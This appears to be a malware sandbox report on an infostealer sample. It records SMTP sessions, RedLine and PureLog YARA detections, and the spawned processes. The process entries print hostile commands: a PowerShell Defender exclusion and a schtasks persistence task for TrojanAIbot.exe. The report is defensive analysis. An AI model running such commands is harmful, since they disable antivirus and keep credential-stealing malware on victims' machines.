                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.370814085 CET5875940051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.067101002 CET5875981851.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:38 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.067435980 CET59818587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.308449984 CET5875981851.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.308669090 CET59818587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.550003052 CET5875981851.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.460877895 CET5875982551.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:42 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.461091995 CET59825587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.699610949 CET5875982551.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.699764013 CET59825587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.938277006 CET5875982551.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.000751972 CET5876201351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:51 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.000935078 CET62013587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.154167891 CET5876201451.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:52 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.154310942 CET62014587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.244342089 CET5876201351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.244560003 CET62013587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.398608923 CET5876201451.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.398778915 CET62014587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.505745888 CET5876201351.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.644256115 CET5876201451.195.88.199192.168.2.5220 TLS go ahead

                                                                                                                                                                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:45
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\AENiBH7X1q.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:5'301'537 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:FE364F6FF698A792C2F9527120136202
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:48
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\AENiBH7X1q.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xe0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2120236907.0000000005800000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.2121412758.0000000006200000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:48
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\microsofts.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1B1EC94BDE0A57A4A82BD2F20B2CB7F3
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.2396891377.0000000007550000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:48
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xab0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:587'776 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:8C8785AC6585CF5C794B74330B3DB88F
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:49
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:35184A2F5B6B06D8E814BA39A601EA5C
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:50
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\build.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xde0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:307'712 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:3B6501FEEF6196F24163313A9F27DBFD
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:50
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x990000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:231'936 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                              File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                              File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                              File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:C44491674DD9A23CD4DB0BCF383E02D9
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:52
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x910000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:52
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xdd0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:187'904 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:52
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:53
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:53
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x2a0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:231'936 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:53
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:53
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
